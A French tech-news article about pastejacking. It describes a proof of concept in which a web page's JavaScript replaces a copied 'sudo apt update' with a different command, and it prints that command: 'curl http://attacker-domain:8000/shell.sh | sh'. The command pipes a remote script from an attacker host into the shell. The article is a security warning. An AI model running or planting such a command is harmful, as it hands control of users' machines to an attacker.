Piratage : Copier-coller des commandes issues d’une page web peut être très dangereux !

Les programmeurs, les administrateurs système, les chercheurs en sécurité ou encore ceux qui aiment bidouiller sur leur PC ont pour habitude de copier-coller des commandes couramment utilisés à partir d'une page web. Seulement et comme le rappelle le spécialiste Gabriel Friedlander, cette pratique n'est pas sans risque. Loin de là.

copier-coller danger
Crédits : Pixabay

Le copier-coller fait partie des manipulations les plus utilisées, que ce soit par les utilisateurs lambda, les programmeurs, les administrateur système, les chercheurs en sécurité informatique ou encore ceux qui aiment bidouiller sur leur PC. Seulement, Gabriel Friendlander, fondateur de la plateforme de formation à la sécurité informatique Wizer, tient à rappeler que cette pratique est loin d'être sans risque, notamment lorsqu'il s'agit de copier-coller des commandes affichées sur des pages Web.

En effet, il n'est pas rare que les développeurs, novices comme expérimentés, copient-collent des commandes couramment utilisées à partir d'une page web (StackOverflow par exemple) dans leurs applications, dans une invite de commande Windows ou dans un terminal Linux.

Mais comme le rappelle M. Friendlander, il existe une méthode qui permet à un attaquant de modifier le contenu de votre presse papier. Le PastJacking, c'est son nom, consiste à l'introduction de lignes de codes malveillantes qui seront automatiquement exécutées lorsque l'utilisateur va coller son texte dans une fenêtre de terminal. Dans une preuve de concept plutôt simple publiée sur son blog personnel, M. Friedlander demande aux lecteurs de copier une commande que la plupart des administrateurs système et des développeurs connaissent : sudo apt udpate (ndrl : une commande utilisée pour récupérer des informations mises à jour sur les logiciels installés sur votre système).

À lire également : Windows 11 – Microsoft veut révolutionner le copier-coller sur Edge et Chrome

Un copier-coller peut faire de gros dégâts

En copiant-collant cette commande dans une zone de texte ou un bloc-note, on se rend compte que le contenu est totalement différent. En effet, la commande sudo apt update est devenue curl http://attacker-domain:8000/shell.sh | sh. En réalité, la supercherie se trouve dans le code Javascript caché derrière la page HTML de la preuve de concept mise en place par Friendlander.

Pour faire simple, dès que vous copiez la commande “sudo apt update” dans un élément HTML, le bout de code malveillant affiché ci-dessous s'exécute. Plus précisément, c'est un écouteur d'évènements Javascript qui capture l'évènement de copie et remplace les données du presse-papiers par le code malveillant de M. Friedlander. “C'est pourquoi vous ne devriez jamais copier-coller des commandes directement dans votre terminal […] Il suffit d'une seule ligne de code injectée dans le code que vous avez copié pour créer une porte dérobée dans votre application. Cette attaque est très simple, mais particulièrement efficace”, prévient-il.

Source : Bleeding Computer


La rédaction vous conseille aussi...

Réagissez à cet article !

Demandez nos derniers articles !

Même Xbox ne sait pas combien la prochaine Xbox va coûter

Matthew Ball, directeur de la stratégie chez Xbox, a profité du Summer Game Fest pour revenir sur la question que tout le monde se pose depuis des mois : comment…

Redmi Note 14 Pro Plus 5G : le smartphone de Xiaomi chute à 191 €, mais l’offre expire bientôt !

Le Redmi Note 14 Pro Plus 5G est de retour à petit prix sur AliExpress. Normalement en vente à 473 €, le smartphone passe à seulement 191,28 € avec le…

“Test Cédric” : l’appli du Crédit Agricole tombe en panne, une drôle de notification est envoyée à des milliers de clients

De nombreux clients du Crédit Agricole ont reçu une mystérieuse notification “Test Cédric” sur leur smartphone. Juste après, l’application mobile de la banque a cessé de fonctionner. “Test Cédric”. De…

Désactivez d’urgence cette option « miracle » qui promet de booster votre smartphone Android : elle fait exactement l’inverse

Posséder un smartphone Android, c’est aussi chercher des méthodes pour l’optimiser, que ce soit en termes d’autonomie, de recharge ou de performances. Si certaines astuces n’ont plus à prouver leur…

Ces faux sites de recrutement vous appâtent avec des offres d’emplois pour Netflix, Spotify ou Coca-Cola

Une nouvelle vague d’escroqueries en ligne consiste en de faux sites de recrutement usurpant l’identité et l’image de grandes marques pour faire miroiter d’alléchantes offres d’emploi aux candidats. Tous les…

Cette étude sur 174 millions de voitures prouve que votre Tesla survivra à la plupart des voitures à essence

Beaucoup d’automobilistes redoutent encore de voir leur électrique s’essouffler trop vite. Une analyse portant sur des millions de véhicules balaie cette crainte. Les Tesla figurent même parmi les voitures les…

Attention si vous recevez un appel d’un conseiller Enedis, c’est une arnaque

Une campagne de démarchage frauduleux usurpant l’identité d’Enedis est actuellement active. L’entreprise appelle à la plus grande vigilance. Les réseaux d’arnaqueurs ne se reposent jamais. Enedis prévient ses clients qu’une…

BYD lance en Europe sa borne 4 fois plus puissante qu’un Superchargeur Tesla

BYD accélère brutalement sa conquête du marché européen. Le géant chinois vient d’inaugurer sa première station de recharge nouvelle génération sur le continent. Sa puissance dépasse de très loin tout…

iCloud : les albums partagés sont désormais accessibles aux smartphones Android et PC Windows

Lors de la WWDC 2026, Apple a fait une grosse annonce pour les familles et groupes d’amis qui partagent régulièrement des photos. Les albums partagés d’iCloud, qui synchronisent les photos…

Oups, Apple confirme sans le vouloir dans iOS 27 que son iPhone Ultra est en chemin

Plusieurs références dans le code source d’iOS 27 dévoilent très clairement les plans d’Apple en matière de smartphones pliants. En effet, on y trouve quelques fonctionnalités qui ne font sens…

Retrouvez sur Phonandroid toute l’actualité autour de l’OS mobile de Google. Le site est une véritable mine d’or autour des produits Android et bien plus ! Vous cherchez un téléphone ou souhaitez maîtriser parfaitement le votre ? Nos articles, dossiers et tutoriels sont là pour vous informer et vous guider. Votre smartphone n’aura plus aucun secret pour vous. Nous vous ferons découvrir les meilleures applications android sur le Google Play. Si les tablettes vous intéressent, vous pourrez suivre l’actualité des différentes marques. Elles sont nombreuses et s’y retrouver est compliqué. Phonandroid et son forum sont là pour vous informer et vous guider.